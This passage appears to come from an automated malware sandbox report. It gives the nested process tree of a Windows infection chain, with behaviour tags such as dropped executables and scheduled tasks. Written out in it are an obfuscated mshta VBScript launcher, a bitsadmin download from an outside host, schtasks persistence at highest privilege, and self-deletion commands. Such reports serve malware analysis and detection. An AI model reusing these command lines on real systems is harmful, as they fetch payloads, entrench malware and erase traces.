                                                                                    "C:\Users\Admin\AppData\Local\Temp\Soft1ww01.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1316
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 900
                                                                                      8⤵
                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                      • Program crash
                                                                                      PID:5844
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c Mon20d3b8b752.exe
                                                                              4⤵
                                                                                PID:2172
                                                                                • C:\Users\Admin\AppData\Local\Temp\7zS0EE76FD4\Mon20d3b8b752.exe
                                                                                  Mon20d3b8b752.exe
                                                                                  5⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks computer location settings
                                                                                  • Modifies registry class
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  PID:2120
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\3bgtBRx2_0I5Wm8qhqm8ueq7.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\3bgtBRx2_0I5Wm8qhqm8ueq7.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:4588
                                                                                  • C:\Users\Admin\Pictures\Adobe Films\5uHIGnUIbOhjoJRaAgH6rdJG.exe
                                                                                    "C:\Users\Admin\Pictures\Adobe Films\5uHIGnUIbOhjoJRaAgH6rdJG.exe"
                                                                                    6⤵
                                                                                    • Executes dropped EXE
                                                                                    • Drops file in Program Files directory
                                                                                    PID:4656
                                                                                    • C:\Windows\svchost.com
                                                                                      "C:\Windows\svchost.com" "C:\Users\Admin\DOCUME~1\JXNIUK~1.EXE"
                                                                                      7⤵
                                                                                        PID:6580
                                                                                        • C:\Users\Admin\DOCUME~1\JXNIUK~1.EXE
                                                                                          C:\Users\Admin\DOCUME~1\JXNIUK~1.EXE
                                                                                          8⤵
                                                                                            PID:6600
                                                                                            • C:\Windows\svchost.com
                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\VTJDZK~1.EXE"
                                                                                              9⤵
                                                                                                PID:6772
                                                                                                • C:\Users\Admin\Pictures\ADOBEF~1\VTJDZK~1.EXE
                                                                                                  C:\Users\Admin\Pictures\ADOBEF~1\VTJDZK~1.EXE
                                                                                                  10⤵
                                                                                                    PID:6848
                                                                                                • C:\Windows\svchost.com
                                                                                                  "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\O1RIQM~1.EXE"
                                                                                                  9⤵
                                                                                                    PID:4192
                                                                                                    • C:\Users\Admin\Pictures\ADOBEF~1\O1RIQM~1.EXE
                                                                                                      C:\Users\Admin\Pictures\ADOBEF~1\O1RIQM~1.EXE
                                                                                                      10⤵
                                                                                                        PID:5296
                                                                                                        • C:\Windows\svchost.com
                                                                                                          "C:\Windows\svchost.com" "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\ADOBEF~1\O1RIQM~1.EXE"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\ADOBEF~1\O1RIQM~1.EXE"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                          11⤵
                                                                                                            PID:7148
                                                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                                                              C:\Windows\System32\mshta.exe vbsCrIPT:cLoSE( CrEaTeoBJeCt( WscRIpT.sHElL ). Run ( cmd /R cOpY /Y ""C:\Users\Admin\Pictures\ADOBEF~1\O1RIQM~1.EXE"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\ADOBEF~1\O1RIQM~1.EXE"" ) do taskkill -f -iM ""%~NxM"" , 0 , truE ) )
                                                                                                              12⤵
                                                                                                                PID:3884
                                                                                                        • C:\Windows\svchost.com
                                                                                                          "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\OAXRIU~1.EXE"
                                                                                                          9⤵
                                                                                                            PID:4980
                                                                                                            • C:\Users\Admin\Pictures\ADOBEF~1\OAXRIU~1.EXE
                                                                                                              C:\Users\Admin\Pictures\ADOBEF~1\OAXRIU~1.EXE
                                                                                                              10⤵
                                                                                                                PID:4464
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                  11⤵
                                                                                                                    PID:212
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /f /im chrome.exe
                                                                                                                      12⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5084
                                                                                                              • C:\Windows\svchost.com
                                                                                                                "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\TK3S9_~1.EXE" /mixtwo
                                                                                                                9⤵
                                                                                                                  PID:2456
                                                                                                                  • C:\Users\Admin\Pictures\ADOBEF~1\TK3S9_~1.EXE
                                                                                                                    C:\Users\Admin\Pictures\ADOBEF~1\TK3S9_~1.EXE /mixtwo
                                                                                                                    10⤵
                                                                                                                      PID:5764
                                                                                                                  • C:\Windows\svchost.com
                                                                                                                    "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\UOBENX~1.EXE"
                                                                                                                    9⤵
                                                                                                                      PID:6964
                                                                                                                      • C:\Users\Admin\Pictures\ADOBEF~1\UOBENX~1.EXE
                                                                                                                        C:\Users\Admin\Pictures\ADOBEF~1\UOBENX~1.EXE
                                                                                                                        10⤵
                                                                                                                          PID:3208
                                                                                                                      • C:\Windows\svchost.com
                                                                                                                        "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\RLKRPI~1.EXE"
                                                                                                                        9⤵
                                                                                                                          PID:4996
                                                                                                                          • C:\Users\Admin\Pictures\ADOBEF~1\RLKRPI~1.EXE
                                                                                                                            C:\Users\Admin\Pictures\ADOBEF~1\RLKRPI~1.EXE
                                                                                                                            10⤵
                                                                                                                              PID:5848
                                                                                                                          • C:\Windows\svchost.com
                                                                                                                            "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\ONPZ2Y~1.EXE"
                                                                                                                            9⤵
                                                                                                                              PID:4616
                                                                                                                              • C:\Users\Admin\Pictures\ADOBEF~1\ONPZ2Y~1.EXE
                                                                                                                                C:\Users\Admin\Pictures\ADOBEF~1\ONPZ2Y~1.EXE
                                                                                                                                10⤵
                                                                                                                                  PID:4356
                                                                                                                              • C:\Windows\svchost.com
                                                                                                                                "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\LKL3RW~1.EXE"
                                                                                                                                9⤵
                                                                                                                                  PID:6900
                                                                                                                                  • C:\Users\Admin\Pictures\ADOBEF~1\LKL3RW~1.EXE
                                                                                                                                    C:\Users\Admin\Pictures\ADOBEF~1\LKL3RW~1.EXE
                                                                                                                                    10⤵
                                                                                                                                      PID:5292
                                                                                                                                      • C:\Users\Admin\AppData\Roaming\6798156.scr
                                                                                                                                        "C:\Users\Admin\AppData\Roaming\6798156.scr" /S
                                                                                                                                        11⤵
                                                                                                                                          PID:4968
                                                                                                                                        • C:\Users\Admin\AppData\Roaming\5778330.scr
                                                                                                                                          "C:\Users\Admin\AppData\Roaming\5778330.scr" /S
                                                                                                                                          11⤵
                                                                                                                                            PID:1628
                                                                                                                                          • C:\Users\Admin\AppData\Roaming\2969674.scr
                                                                                                                                            "C:\Users\Admin\AppData\Roaming\2969674.scr" /S
                                                                                                                                            11⤵
                                                                                                                                              PID:4852
                                                                                                                                            • C:\Users\Admin\AppData\Roaming\8858660.scr
                                                                                                                                              "C:\Users\Admin\AppData\Roaming\8858660.scr" /S
                                                                                                                                              11⤵
                                                                                                                                                PID:4284
                                                                                                                                              • C:\Users\Admin\AppData\Roaming\3040411.scr
                                                                                                                                                "C:\Users\Admin\AppData\Roaming\3040411.scr" /S
                                                                                                                                                11⤵
                                                                                                                                                  PID:7388
                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                              "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\1X6CCD~1.EXE"
                                                                                                                                              9⤵
                                                                                                                                                PID:2176
                                                                                                                                                • C:\Users\Admin\Pictures\ADOBEF~1\1X6CCD~1.EXE
                                                                                                                                                  C:\Users\Admin\Pictures\ADOBEF~1\1X6CCD~1.EXE
                                                                                                                                                  10⤵
                                                                                                                                                    PID:3124
                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                      11⤵
                                                                                                                                                        PID:2176
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--oYd2f1"
                                                                                                                                                          12⤵
                                                                                                                                                            PID:200
                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x1b0,0x1e8,0x7ffded06dec0,0x7ffded06ded0,0x7ffded06dee0
                                                                                                                                                              13⤵
                                                                                                                                                                PID:8200
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff7854c9e70,0x7ff7854c9e80,0x7ff7854c9e90
                                                                                                                                                                  14⤵
                                                                                                                                                                    PID:8272
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --mojo-platform-channel-handle=1744 /prefetch:8
                                                                                                                                                                  13⤵
                                                                                                                                                                    PID:7436
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1692 /prefetch:2
                                                                                                                                                                    13⤵
                                                                                                                                                                      PID:6560
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --mojo-platform-channel-handle=2096 /prefetch:8
                                                                                                                                                                      13⤵
                                                                                                                                                                        PID:9072
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2484 /prefetch:1
                                                                                                                                                                        13⤵
                                                                                                                                                                          PID:7684
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=1736 /prefetch:1
                                                                                                                                                                          13⤵
                                                                                                                                                                            PID:9236
                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --mojo-platform-channel-handle=3184 /prefetch:8
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:10204
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3176 /prefetch:2
                                                                                                                                                                              13⤵
                                                                                                                                                                                PID:8768
                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --mojo-platform-channel-handle=848 /prefetch:8
                                                                                                                                                                                13⤵
                                                                                                                                                                                  PID:7584
                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --mojo-platform-channel-handle=2944 /prefetch:8
                                                                                                                                                                                  13⤵
                                                                                                                                                                                    PID:7596
                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --mojo-platform-channel-handle=2000 /prefetch:8
                                                                                                                                                                                    13⤵
                                                                                                                                                                                      PID:7808
                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1676,9718345037643881361,10094661973530232235,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw200_529203236" --mojo-platform-channel-handle=1872 /prefetch:8
                                                                                                                                                                                      13⤵
                                                                                                                                                                                        PID:2796
                                                                                                                                                                              • C:\Windows\svchost.com
                                                                                                                                                                                "C:\Windows\svchost.com" "C:\Users\Admin\Pictures\ADOBEF~1\DIDDLR~1.EXE"
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:1388
                                                                                                                                                                                  • C:\Users\Admin\Pictures\ADOBEF~1\DIDDLR~1.EXE
                                                                                                                                                                                    C:\Users\Admin\Pictures\ADOBEF~1\DIDDLR~1.EXE
                                                                                                                                                                                    10⤵
                                                                                                                                                                                      PID:6192
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-60GA2.tmp\DIDDLR~1.tmp
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-60GA2.tmp\DIDDLR~1.tmp" /SL5="$104B2,506127,422400,C:\Users\Admin\Pictures\ADOBEF~1\DIDDLR~1.EXE"
                                                                                                                                                                                        11⤵
                                                                                                                                                                                          PID:5348
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-O05MM.tmp\DYbALA.exe
                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-O05MM.tmp\DYbALA.exe" /S /UID=2709
                                                                                                                                                                                            12⤵
                                                                                                                                                                                              PID:6656
                                                                                                                                                                                              • C:\Program Files\Mozilla Firefox\GLOZSQHPDZ\foldershare.exe
                                                                                                                                                                                                "C:\Program Files\Mozilla Firefox\GLOZSQHPDZ\foldershare.exe" /VERYSILENT
                                                                                                                                                                                                13⤵
                                                                                                                                                                                                  PID:7204
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\ba-65a3b-d12-58089-2145572aa1600\SHoxyshaemyqa.exe
                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\ba-65a3b-d12-58089-2145572aa1600\SHoxyshaemyqa.exe"
                                                                                                                                                                                                  13⤵
                                                                                                                                                                                                    PID:5112
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\ee-7fcc3-09b-b1abf-2bf5f784c8969\SHasaeqashupa.exe
                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\ee-7fcc3-09b-b1abf-2bf5f784c8969\SHasaeqashupa.exe"
                                                                                                                                                                                                    13⤵
                                                                                                                                                                                                      PID:2504
                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e0xskmrs.32d\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                        14⤵
                                                                                                                                                                                                          PID:8228
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\e0xskmrs.32d\GcleanerEU.exe
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\e0xskmrs.32d\GcleanerEU.exe /eufive
                                                                                                                                                                                                            15⤵
                                                                                                                                                                                                              PID:8868
                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b31akgyh.iqh\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                            14⤵
                                                                                                                                                                                                              PID:8640
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\b31akgyh.iqh\installer.exe
                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\b31akgyh.iqh\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                15⤵
                                                                                                                                                                                                                  PID:8988
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                    "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\b31akgyh.iqh\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\b31akgyh.iqh\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1633890876 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                      PID:8488
                                                                                                                                                                                                                • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0kpnsg35.lzc\any.exe & exit
                                                                                                                                                                                                                  14⤵
                                                                                                                                                                                                                    PID:8788
                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\0kpnsg35.lzc\any.exe
                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\0kpnsg35.lzc\any.exe
                                                                                                                                                                                                                      15⤵
                                                                                                                                                                                                                        PID:9100
                                                                                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\txrheb4b.kxo\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                      14⤵
                                                                                                                                                                                                                        PID:9000
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\txrheb4b.kxo\gcleaner.exe
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\txrheb4b.kxo\gcleaner.exe /mixfive
                                                                                                                                                                                                                          15⤵
                                                                                                                                                                                                                            PID:8804
                                                                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jb5qux5d.xgc\autosubplayer.exe /S & exit
                                                                                                                                                                                                                          14⤵
                                                                                                                                                                                                                            PID:9156
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\jb5qux5d.xgc\autosubplayer.exe
                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\jb5qux5d.xgc\autosubplayer.exe /S
                                                                                                                                                                                                                              15⤵
                                                                                                                                                                                                                                PID:8360
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu303C.tmp\tempfile.ps1"
                                                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                                                    PID:9496
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu303C.tmp\tempfile.ps1"
                                                                                                                                                                                                                                    16⤵
                                                                                                                                                                                                                                      PID:4976
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu303C.tmp\tempfile.ps1"
                                                                                                                                                                                                                                      16⤵
                                                                                                                                                                                                                                        PID:8024
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu303C.tmp\tempfile.ps1"
                                                                                                                                                                                                                                        16⤵
                                                                                                                                                                                                                                          PID:6812
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu303C.tmp\tempfile.ps1"
                                                                                                                                                                                                                                          16⤵
                                                                                                                                                                                                                                            PID:8580
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu303C.tmp\tempfile.ps1"
                                                                                                                                                                                                                                            16⤵
                                                                                                                                                                                                                                              PID:6760
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsu303C.tmp\tempfile.ps1"
                                                                                                                                                                                                                                              16⤵
                                                                                                                                                                                                                                                PID:6664
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                16⤵
                                                                                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                                                                                PID:9088
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:7000
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                              schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                              • Creates scheduled task(s)
                                                                                                                                                                                                                              PID:7008
                                                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\Az3l8L83hrEtbewwc18G8QPn.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\Az3l8L83hrEtbewwc18G8QPn.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                            PID:4636
                                                                                                                                                                                                                            • C:\Windows\svchost.com
                                                                                                                                                                                                                              "C:\Windows\svchost.com" "C:\Windows\System32\cmd.exe" /c taskkill /im Az3l8L83hrEtbewwc18G8QPn.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\Az3l8L83hrEtbewwc18G8QPn.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                              7⤵
                                                                                                                                                                                                                                PID:5048
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\System32\cmd.exe /c taskkill /im Az3l8L83hrEtbewwc18G8QPn.exe /f & timeout /t 6 & del /f /q C:\Users\Admin\Pictures\Adobe Films\Az3l8L83hrEtbewwc18G8QPn.exe & del C:\ProgramData\*.dll & exit
                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                    PID:2028
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
